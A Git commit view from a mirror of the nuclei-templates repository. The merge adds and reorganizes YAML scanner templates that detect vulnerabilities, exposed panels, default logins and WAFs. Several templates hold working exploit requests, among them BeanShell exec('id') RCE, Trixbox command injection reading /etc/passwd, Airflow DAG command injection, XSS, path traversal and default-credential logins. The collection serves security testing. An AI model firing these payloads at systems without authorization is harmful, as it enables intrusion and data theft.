daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #55 from projectdiscovery/master 

Updation
patch-1
Dhiyaneshwaran 2021-06-05 13:35:20 +05:30 committed by GitHub
parent 51ab5d5f29 ba0d092d4d
commit ac8029636e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
72 changed files with 1389 additions and 106 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
README.md
View File

@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 321 | vulnerabilities | 170 | exposed-panels | 137 |
| takeovers | 67 | exposures | 104 | technologies | 77 |
| misconfiguration | 66 | workflows | 31 | miscellaneous | 22 |
| default-logins | 28 | exposed-tokens | 0 | dns | 8 |
| fuzzing | 9 | helpers | 8 | iot | 12 |
| cves | 329 | vulnerabilities | 175 | exposed-panels | 146 |
| takeovers | 67 | exposures | 105 | technologies | 98 |
| misconfiguration | 66 | workflows | 32 | miscellaneous | 22 |
| default-logins | 30 | exposed-tokens | 0 | dns | 9 |
| fuzzing | 9 | helpers | 8 | iot | 13 |
**108 directories, 1148 files**.
**111 directories, 1207 files**.
</td>
</tr>

5
vulnerabilities/other/xiuno-bbs-reinstallation.yaml → cnvd/CNVD-2019-01348.yaml
View File

@ -1,11 +1,12 @@
id: xiuno-bbs-reinstallation
id: CNVD-2019-01348
info:
name: Xiuno BBS CNVD-2019-01348
author: princechaddha
severity: medium
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
tags: xiuno
tags: xiuno,cnvd
requests:
- method: GET

10
vulnerabilities/other/xunchi-file-read.yaml → cnvd/CNVD-2020-23735.yaml
View File

@ -1,16 +1,18 @@
id: xunchi-file-read
id: CNVD-2020-23735
info:
name: Xxunchi LFR (CNVD-2019-01348
name: Xxunchi Local File read
author: princechaddha
severity: medium
description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information.
reference: https://www.cnvd.org.cn/flaw/show/2025171
tags: xunchi,lfi
tags: xunchi,lfi,cnvd
requests:
- method: GET
path:
- "{{BaseURL}}/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php"
matchers-condition: and
matchers:
- type: status
@ -21,4 +23,4 @@ requests:
- "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"
- "display_errors"
part: body
condition: and
condition: and

4
default-logins/smartweb/ruijie-smartweb-default-password.yaml → cnvd/CNVD-2020-56167.yaml
View File

@ -1,11 +1,11 @@
id: ruijie-smartweb-default-password
id: CNVD-2020-56167
info:
name: Ruijie Smartweb Default Password
author: pikpikcu
severity: low
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
tags: ruijie,default-login
tags: ruijie,default-login,cnvd
requests:
- method: POST

2
vulnerabilities/other/CNVD-2020-62422.yaml → cnvd/CNVD-2020-62422.yaml
View File

@ -5,7 +5,7 @@ info:
author: pikpikcu
severity: medium
reference: https://blog.csdn.net/m0_46257936/article/details/113150699
tags: lfi
tags: lfi,cnvd
requests:
- method: GET

4
vulnerabilities/other/weiphp-path-traversal.yaml → cnvd/CNVD-2020-68596.yaml
View File

@ -1,11 +1,11 @@
id: weiphp-path-traversal
id: CNVD-2020-68596
info:
name: WeiPHP 5.0 Path Traversal
author: pikpikcu
severity: critical
reference: http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html
tags: weiphp,lfi
tags: weiphp,lfi,cnvd
requests:
- raw:

4
exposures/configs/eea-disclosure.yaml → cnvd/CNVD-2021-10543.yaml
View File

@ -1,11 +1,11 @@
id: eea-disclosure
id: CNVD-2021-10543
info:
name: EEA Information Disclosure
author: pikpikcu
severity: high
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
tags: config,exposure
tags: config,exposure,cnvd
requests:
- method: GET

4
exposures/configs/ruijie-smartweb-disclosure.yaml → cnvd/CNVD-2021-17369.yaml
View File

@ -1,11 +1,11 @@
id: ruijie-smartweb-disclosure
id: CNVD-2021-17369
info:
name: Ruijie Smartweb Management System Password Information Disclosure
author: pikpikcu
severity: medium
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369
tags: ruijie,disclosure
tags: ruijie,disclosure,cnvd
requests:
- method: GET

45
cnvd/CNVD-2021-30167.yaml Normal file
View File

@ -0,0 +1,45 @@
id: CNVD-2021-30167
info:
name: UFIDA NC BeanShell Remote Code Execution
author: pikpikcu
severity: high
reference: |
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
- https://www.cnvd.org.cn/webinfo/show/6491
tags: beanshell,rce,cnvd
requests:
- raw:
- | #linux
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("id");
- | #windows
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("ipconfig");
matchers-condition: and
matchers:
- type: regex
regex:
- "uid="
- "Windows IP"
condition: or
- type: word
words:
- "BeanShell Test Servlet"
- type: status
status:
- 200

32
cves/2017/CVE-2017-14535.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2017-14535
info:
name: Trixbox - 2.8.0.4 OS Command Injection Vulnerability
author: pikpikcu
severity: high
reference: |
- https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
- https://www.exploit-db.com/exploits/49913
tags: cve,cve2017,trixbox,rce
requests:
- raw:
- |
GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
Connection: close
Cache-Control: max-age=0
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

21
cves/2017/CVE-2017-3528.yaml Normal file
View File

@ -0,0 +1,21 @@
id: CVE-2017-3528
info:
name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect
author: 0x_Akoko
severity: low
reference: |
- https://blog.zsec.uk/cve-2017-3528/
- https://www.exploit-db.com/exploits/43592
tags: oracle,redirect
requests:
- method: GET
path:
- "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com"
matchers:
- type: word
words:
- 'noresize src="/\example.com?configName='
part: body

4
cves/2018/CVE-2018-0296.yaml
View File

@ -11,12 +11,16 @@ requests:
- method: GET
path:
- "{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions"
headers:
Accept-Encoding: deflate
matchers-condition: and
matchers:
- type: word
words:
- "///sessions"
part: body
- type: status
status:
- 200

4
exposures/logs/circarlife-system-log.yaml → cves/2018/CVE-2018-12634.yaml
View File

@ -1,4 +1,4 @@
id: circarlife-system-log
id: CVE-2018-12634
info:
name: Exposed CirCarLife System Log
@ -6,7 +6,7 @@ info:
description: CirCarLife is an internet-connected electric vehicle charging station
reference: https://circontrol.com/
severity: medium
tags: scada,circontrol,circarlife,logs
tags: cve,cve2018,scada,circontrol,circarlife,logs
requests:
- method: GET

64
cves/2020/CVE-2020-11978.yaml Normal file
View File

@ -0,0 +1,64 @@
id: CVE-2020-11978
info:
name: Apache Airflow <= 1.10.10 - 'Example Dag' Remote Code Execution
author: pdteam
severity: high
description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.
reference: |
- https://github.com/pberba/CVE-2020-11978
- https://nvd.nist.gov/vuln/detail/CVE-2020-11978
- https://twitter.com/wugeej/status/1400336603604668418
tags: cve,cve2020,apache,airflow,rce
requests:
- raw:
- |
GET /api/experimental/test HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
- |
GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
- |
POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
Content-Length: 85
Content-Type: application/json
{"conf": {"message": "\"; touch test #"}}
- |
GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
extractors:
- type: regex
name: exec_date
part: body
group: 1
internal: true
regex:
- '"execution_date":"([0-9-A-Z:+]+)"'
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body_4, "operator":"BashOperator")'
- 'contains(all_headers_4, "application/json")'
condition: and

10
misconfiguration/airflow-api-exposure.yaml → cves/2020/CVE-2020-13927.yaml
View File

@ -1,18 +1,20 @@
id: airflow-api-exposure
id: CVE-2020-13927
info:
name: Apache Airflow API Exposure / Unauthenticated Access
name: Unauthenticated Airflow Experimental REST API
author: pdteam
severity: medium
tags: apache,airflow,unauth
tags: cve,cve2020,apache,airflow,unauth
requests:
- method: GET
path:
- '{{BaseURL}}/api/experimental/latest_runs'
matchers:
- type: word
words:
- '"dag_run_url":'
- '{"items":['
- '"dag_id":'
- '"items":'
condition: and

2
cves/2020/CVE-2020-36112.yaml
View File

@ -3,7 +3,7 @@ id: CVE-2020-36112
info:
name: CSE Bookstore 1.0 SQL Injection
author: geeknik
description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database.
description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database.
reference: |
- https://www.exploit-db.com/exploits/49314
- https://www.tenable.com/cve/CVE-2020-36112

21
cves/2020/CVE-2020-6308.yaml Normal file
View File

@ -0,0 +1,21 @@
id: CVE-2020-6308
info:
name: Unauthenticated Blind SSRF in SAP
author: madrobot
severity: medium
reference: https://github.com/InitRoot/CVE-2020-6308-PoC
tags: cve,cve2020,sap,ssrf,oob
requests:
- method: POST
path:
- '{{BaseURL}}/AdminTools/querybuilder/logon?framework='
body: aps={{interactsh-url}}&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"

31
cves/2021/CVE-2021-21985.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2021-21985
info:
name: VMware vSphere Client (HTML5) RCE
author: D0rkerDevil
severity: critical
description: |
The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2021-21985
- https://www.vmware.com/security/advisories/VMSA-2021-0010.html
- https://github.com/alt3kx/CVE-2021-21985_PoC
tags: cve,cve2021,rce,vsphere
requests:
- raw:
- |
POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/json
Content-Length: 86
Connection: close
{"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}
matchers:
- type: word
words:
- '{"result":{"isDisconnected":'
part: body

3
cves/2021/CVE-2021-22122.yaml
View File

@ -23,6 +23,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/error3?msg=30&data=';alert('nuclei');//"
- "{{BaseURL}}/omni_success?cmdb_edit_path=\");alert('nuclei');//"
matchers-condition: and
matchers:
- type: word
@ -30,4 +31,4 @@ requests:
- "nuclei"
- "No policy has been chosen."
condition: and
part: body
part: body

34
cves/2021/CVE-2021-24316.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2021-24316
info:
author: 0x_Akoko
description: Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS.
name: An Unauthenticated Reflected XSS & XFS Mediumish theme through 1.0.47 for WordPress
severity: medium
tags: cve,cve2021,mediumish,xss,wordpress
reference: |
- https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e
- https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt
requests:
- method: GET
path:
- '{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E '
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<script>alert(/{{randstr}}/)</script>"
- "Sorry, no posts matched your criteria."
part: body
condition: and
- type: word
words:
- "text/html"
part: header

61
default-logins/apache/airflow-default-credentials.yaml Normal file
View File

@ -0,0 +1,61 @@
id: airflow-default-credentials
info:
name: Apache Airflow Default Credentials
author: pdteam
severity: critical
tags: airflow,default-login
reference: https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html
requests:
- raw:
- |
GET /admin/airflow/login HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
- |
POST /admin/airflow/login HTTP/1.1
Host: {{Hostname}}
Content-Length: 152
Cache-Control: max-age=0
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/admin/airflow/login
Accept-Encoding: gzip, deflate
Accept-Language: en-IN,en;q=0.9
Connection: close
username=airflow&password=airflow&_csrf_token={{csrf_token}}
extractors:
- type: regex
name: csrf_token
group: 1
part: body
internal: true
regex:
- 'csrf_token" type="hidden" value="([A-Za-z0-9.-]+)">'
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
words:
- "session=."
- "/admin/"
part: header
condition: and
- type: word
words:
- 'You should be redirected automatically to target URL: <a href="/admin/">/admin/</a>'
part: body
- type: status
status:
- 302

29
default-logins/arl/arl-default-password.yaml Normal file
View File

@ -0,0 +1,29 @@
id: arl-default-password
info:
name: ARL Default Password
author: pikpikcu
severity: high
tags: arl,default-login
requests:
- method: POST
path:
- "{{BaseURL}}/api/user/login"
headers:
Content-Type: application/json; charset=UTF-8
body: |
{"username":"admin","password":"arlpass"}
matchers-condition: and
matchers:
- type: word
words:
- '"message": "success"'
- '"username": "admin"'
- '"type": "login"'
condition: and
- type: status
status:
- 200

33
default-logins/szhe/szhe-default-password.yaml Normal file
View File

@ -0,0 +1,33 @@
id: szhe-default-password
info:
name: Szhe Default Password
author: pikpikcu
severity: low
tags: szhe,default-login
vendor: https://github.com/Cl0udG0d/SZhe_Scan
requests:
- method: POST
path:
- "{{BaseURL}}/login/"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
email=springbird@qq.com&password=springbird&remeber=true
matchers-condition: and
matchers:
- type: word
words:
- 'You should be redirected automatically to target URL: <a href="/">/</a>'
- type: word
words:
- 'Set-Cookie: session'
part: header
- type: status
status:
- 302

172
dns/dns-waf-detect.yaml Normal file
View File

@ -0,0 +1,172 @@
id: dns-waf-detect
info:
name: DNS WAF Detection
author: lu4nx
severity: info
tags: tech,waf,dns
dns:
- name: "{{FQDN}}"
type: CNAME
recursion: true
retries: 5
class: inet
- name: "{{FQDN}}"
type: NS
recursion: true
retries: 5
class: inet
matchers:
- type: word
name: sanfor-shield
words:
- ".sangfordns.com"
- type: word
name: 360panyun
words:
- ".360panyun.com"
- type: word
name: baiduyun
words:
- ".yunjiasu-cdn.net"
- type: word
name: chuangyudun
words:
- ".365cyd.cn"
- ".cyudun.net"
- type: word
name: knownsec
words:
- ".jiashule.com"
- ".jiasule.org"
- type: word
name: huaweicloud
words:
- ".huaweicloudwaf.com"
- type: word
name: xinliuyun
words:
- ".ngaagslb.cn"
- type: word
name: chinacache
words:
- ".chinacache.net"
- ".ccgslb.net"
- type: word
name: nscloudwaf
words:
- ".nscloudwaf.com"
- type: word
name: wangsu
words:
- ".wsssec.com"
- ".lxdns.com"
- ".wscdns.com"
- ".cdn20.com"
- ".cdn30.com"
- ".ourplat.net"
- ".wsdvs.com"
- ".wsglb0.com"
- ".wswebcdn.com"
- ".wswebpic.com"
- ".wsssec.com"
- ".wscloudcdn.com"
- ".mwcloudcdn.com"
- type: word
name: qianxin
words:
- ".360safedns.com"
- ".360cloudwaf.com"
- type: word
name: baiduyunjiasu
words:
- ".yunjiasu-cdn.net"
- type: word
name: anquanbao
words:
- ".anquanbao.net"
- type: regex
name: aliyun
regex:
- '\.w\.kunlun\w{2,3}\.com'
- type: regex
name: aliyun-waf
regex:
- '\.aliyunddos\d+\.com'
- '\.aliyunwaf\.com'
- '\.aligaofang\.com'
- '\.aliyundunwaf\.com'
- type: word
name: xuanwudun
words:
- ".saaswaf.com"
- ".dbappwaf.cn"
- type: word
name: yundun
words:
- ".hwwsdns.cn"
- ".yunduncname.com"
- type: word
name: knownsec-ns
words:
- ".jiasule.net"
- type: word
name: chuangyudun
words:
- ".365cyd.net"
- type: word
name: qianxin
words:
- ".360wzb.com"
- type: word
name: anquanbao
words:
- ".anquanbao.com"
- type: word
name: wangsu
words:
- ".chinanetcenter.com"
- type: word
name: baiduyunjiasue
words:
- ".ns.yunjiasu.com"
- type: word
name: chinacache
words:
- ".chinacache.com"
- type: word
name: cloudflare
words:
- "ns.cloudflare.com"
- type: word
name: edns
words:
- ".iidns.com"

19
exposed-panels/airflow-exposure.yaml
View File

@ -1,19 +0,0 @@
id: airflow-exposure
info:
name: Apache Airflow Exposure / Unauthenticated Access
author: pdteam
severity: medium
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/admin/'
matchers:
- type: word
words:
- '<title>Airflow - DAGs</title>'
- '<a href="https://github.com/apache/airflow">'
condition: and

24
exposed-panels/airflow-panel.yaml Normal file
View File

@ -0,0 +1,24 @@
id: airflow-panel
info:
name: Airflow Admin login
author: pdteam
severity: info
tags: panel,apache,airflow
requests:
- method: GET
path:
- "{{BaseURL}}/admin/airflow/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Airflow - Login"
- type: status
status:
- 200

23
exposed-panels/clave-login-panel.yaml Normal file
View File

@ -0,0 +1,23 @@
id: clave-login-panel
info:
name: Clave login panel
author: __Fazal
severity: info
tags: panel,clave
requests:
- method: GET
path:
- '{{BaseURL}}/admin.php'
redirects: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Clave"

18
exposed-panels/dotcms-admin-panel.yaml Normal file
View File

@ -0,0 +1,18 @@
id: dotcms-admin-panel
info:
name: dotAdmin Panel
author: impramodsargar
severity: info
tags: panel
requests:
- method: GET
path:
- "{{BaseURL}}/dotAdmin/"
matchers-condition: and
matchers:
- type: word
words:
- '<title>dotCMS Content Management Platform</title>'

22
exposed-panels/ems-login-panel.yaml Normal file
View File

@ -0,0 +1,22 @@
id: ems-login-panel
info:
name: EMS Login page detection
author: __Fazal
severity: info
tags: panel,ems
requests:
- method: GET
path:
- '{{BaseURL}}/EMSWebClient/Login.aspx'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "EMS Web Client - Login"

22
exposed-panels/lancom-router-panel.yaml Normal file
View File

@ -0,0 +1,22 @@
id: lancom-router-panel
info:
name: Lancom Router Panel
author: __Fazal
severity: info
tags: panel,lancom
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "LANCOM 1790VA-4G"

23
exposed-panels/luci-login-detection.yaml Normal file
View File

@ -0,0 +1,23 @@
id: luci-login-detection
info:
name: LuCi Login Detector
author: aashiq
severity: info
description: Searches for LuCi Login pages by attempting to query the cgi-bin endpoint
tags: login
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/luci"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Authorization Required"

22
exposed-panels/openerp-database.yaml Normal file
View File

@ -0,0 +1,22 @@
id: openerp-database
info:
name: OpenERP database instances
author: impramodsargar
severity: info
tags: openerp
requests:
- method: GET
path:
- "{{BaseURL}}/web/database/selector/"
matchers-condition: and
matchers:
- type: word
words:
- '<title>Odoo</title>'
- type: status
status:
- 200

23
exposed-panels/servicedesk-login-panel.yaml Normal file
View File

@ -0,0 +1,23 @@
id: servicedesk-login-panel
info:
name: Servicedesk Login Panel Detector
author: aashiq
severity: info
description: Searches for ServiceDesk login panels by trying to query the "/servicedesk/customer/user/login" endpoint
tags: servicedesk,confluence,jira,panel
requests:
- method: GET
path:
- "{{BaseURL}}/servicedesk/customer/user/login"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "https://confluence.atlassian.com"

22
exposed-panels/synnefo-admin-panel.yaml Normal file
View File

@ -0,0 +1,22 @@
id: synnefo-admin-panel
info:
name: Synnefo Admin Panel Exposure
author: impramodsargar
severity: info
tags: panel,synnefo
requests:
- method: GET
path:
- "{{BaseURL}}/synnefoclient/"
matchers-condition: and
matchers:
- type: word
words:
- '<title>Synnefo Admin</title>'
- type: status
status:
- 200

22
exposed-panels/zenario-login-panel.yaml Normal file
View File

@ -0,0 +1,22 @@
id: zenario-login-panel
info:
name: Zenario Admin login
author: __Fazal
severity: info
tags: panel,zenario
requests:
- method: GET
path:
- '{{BaseURL}}/zenario/admin/welcome.php'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Welcome to Zenario"

3
exposures/backups/sql-dump.yaml
View File

@ -30,12 +30,15 @@ requests:
- "{{BaseURL}}/wp-content/uploads/dump.sql"
headers:
Range: "bytes=0-3000"
max-size: 2000 # Size in bytes - Max Size to read from server response
matchers-condition: and
matchers:
- type: regex
regex:
- "(?m)(?:DROP|CREATE|(?:UN)?LOCK) TABLE|INSERT INTO"
part: body
- type: status
status:
- 200

4
exposures/backups/zip-backup-files.yaml
View File

@ -32,6 +32,8 @@ requests:
- "{{BaseURL}}/{{Hostname}}.sql.zip"
- "{{BaseURL}}/{{Hostname}}.sql.z"
- "{{BaseURL}}/{{Hostname}}.sql.tar.z"
max-size: 500 # Size in bytes - Max Size to read from server response
matchers-condition: and
matchers:
- type: binary
@ -49,10 +51,12 @@ requests:
- "504B0304" # zip
condition: or
part: body
- type: regex
regex:
- "application/[-\\w.]+"
part: header
- type: status
status:
- 200

2
exposures/configs/airflow-configuration-exposure.yaml
View File

@ -4,7 +4,7 @@ info:
name: Apache Airflow Configuration Exposure
author: pdteam
severity: medium
tags: exposure,config
tags: exposure,config,airflow,apache
requests:
- method: GET

25
exposures/configs/detect-drone-config.yaml Normal file
View File

@ -0,0 +1,25 @@
id: detect-drone-config
info:
name: Detect Drone Configuration
author: geeknik
description: Drone is a Container-Native, Continuous Delivery Platform -- https://github.com/drone/drone
severity: high
tags: config,exposure,drone
requests:
- method: GET
path:
- "{{BaseURL}}/.drone.yml"
matchers-condition: and
matchers:
- type: word
words:
- "kind:"
- "name:"
- "steps:"
condition: and
- type: status
status:
- 200

7
exposures/configs/exposed-bzr.yaml
View File

@ -18,8 +18,13 @@ requests:
words:
- "parent_location"
- "push_location"
condition: and
condition: or
- type: status
status:
- 200
- type: word
part: header
words:
- "text/plain"

12
exposures/configs/exposed-svn.yaml
View File

@ -4,14 +4,12 @@ info:
name: Exposed SVN Directory
author: udit_thakkur & dwisiswant0
severity: medium
tags: config,exposure
tags: config,exposure,svn
requests:
- method: GET
path:
- "{{BaseURL}}/.svn/entries"
- "{{BaseURL}}/.svn/prop-base/"
- "{{BaseURL}}/.svn/text-base/"
matchers-condition: and
matchers:
@ -19,10 +17,12 @@ requests:
part: body
regex:
- "(^10\\s*dir|\\.svn-base|has-props|svn:\\/\\/|([\\da-f]{32}[\\S+\\r\\n\\s]+[\\d]{4}-[\\d]{2}-[\\d]{2}T[\\d]{2}:[\\d]{2}:[\\d]{2}.[\\d]{6}Z))"
- type: status
status:
- 200
- type: dsl
dsl:
- 'contains(tolower(body), "<html") == false && contains(tolower(body), "</body>") == false'
- type: word
part: header
words:
- "text/plain"

18
exposures/configs/exposed-vscode.yaml Normal file
View File

@ -0,0 +1,18 @@
id: exposed-vscode
info:
name: Exposed VSCode Folders
author: aashiq
severity: low
description: Searches for exposed Visual Studio Code Directories by querying the /.vscode endpoint and existence of "index of" in the body
tags: vscode,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/.vscode/"
matchers:
- type: word
words:
- "Index of /.vscode"
part: body

25
exposures/configs/hikvision-info-leak.yaml Normal file
View File

@ -0,0 +1,25 @@
id: hikvision-info-leak
info:
name: Hikvision Info Leak
author: pikpikcu
severity: medium
tags: exposure,config
requests:
- method: GET
path:
- '{{BaseURL}}/config/user.xml'
matchers-condition: and
matchers:
- type: word
words:
- '<user name='
- 'password='
condition: and
- type: word
words:
- "text/xml"
part: header

27
exposures/configs/zend-config-file.yaml Normal file
View File

@ -0,0 +1,27 @@
id: zend-config-file
info:
name: Zend Configuration File
author: pdteam
severity: high
tags: config,exposure,zend,php
requests:
- method: GET
path:
- "{{BaseURL}}/application/configs/application.ini"
matchers-condition: and
matchers:
- type: word
words:
- "resources.db.params.password"
- type: word
words:
- "text/plain"
part: header
- type: status
status:
- 200

2
exposures/tokens/generic/general-tokens.yaml
View File

@ -26,6 +26,8 @@ requests:
part: body
regex:
- (K|k)ey(up|down|press)
- (K|k)eyboard(N|n)avigation
condition: or
negative: true
extractors:

23
iot/epson-wf-series.yaml Normal file
View File

@ -0,0 +1,23 @@
id: epson-wf-series
info:
name: Epson WF Series Detection
author: aashiq
severity: info
description: Searches for Epson WF series printers on the domain
tags: iot,printer
requests:
- method: GET
path:
- "{{BaseURL}}/PRESENTATION/HTML/TOP/PRTINFO.HTML"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "SEIKO EPSON"

2
miscellaneous/detect-options-method.yaml
View File

@ -16,4 +16,4 @@ requests:
part: header
group: 1
regex:
- "Allow: ([A-Z,]+)"
- "Allow: ([A-Z, ]+)"

26
misconfiguration/airflow/airflow-debug.yaml Normal file
View File

@ -0,0 +1,26 @@
id: airflow-debug
info:
name: Airflow Debug Trace
author: pdteam
severity: low
tags: apache,airflow,fpd
requests:
- method: GET
path:
- "{{BaseURL}}/admin/airflow/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<h1> Ooops. </h1>"
- "Traceback (most recent call last)"
condition: and
- type: status
status:
- 500

0
misconfiguration/unauthenticated-airflow.yaml → misconfiguration/airflow/unauthenticated-airflow.yaml
View File

27
misconfiguration/alibaba-mongoshake-unauth.yaml Normal file
View File

@ -0,0 +1,27 @@
id: alibaba-mongoshake-unauth
info:
name: Alibaba Mongoshake Unauth
author: pikpikcu
severity: info
tags: mongoshake,unauth
requests:
- method: GET
path:
- '{{BaseURL}}/'
matchers-condition: and
matchers:
- type: word
words:
- '{"Uri":"/worker","Method":"GET"}'
- type: word
words:
- 'text/plain'
part: header
- type: status
status:
- 200

25
misconfiguration/private-key-exposure.yaml Normal file
View File

@ -0,0 +1,25 @@
id: private-key-exposure
info:
name: Private key exposure via helper detector
author: aashiq
severity: high
description: Searches for private key exposure by attempting to query the helper endpoint on node_modules
tags: exposure,node
requests:
- method: GET
path:
- "{{BaseURL}}/node_modules/mqtt/test/helpers/"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Index of /node_modules/mqtt/test/helpers"
- "Parent Directory"
condition: and

10
takeovers/bitbucket-takeover.yaml
View File

@ -12,8 +12,14 @@ requests:
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- The page you have requested does not exist
- Repository not found
- Repository not found
part: body
- type: word
words:
- text/plain
part: header

7
takeovers/landingi-takeover.yaml
View File

@ -3,9 +3,9 @@ id: landingi-takeover
info:
name: landingi takeover detection
author: pdcommunity
severity: high
severity: info
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/117
requests:
- method: GET
@ -16,4 +16,5 @@ requests:
- type: word
words:
- It looks like you're lost
- The page you are looking for is not found
- The page you are looking for is not found
condition: and

24
technologies/airflow-detect.yaml Normal file
View File

@ -0,0 +1,24 @@
id: airflow-detect
info:
name: Apache Airflow
author: pdteam
severity: info
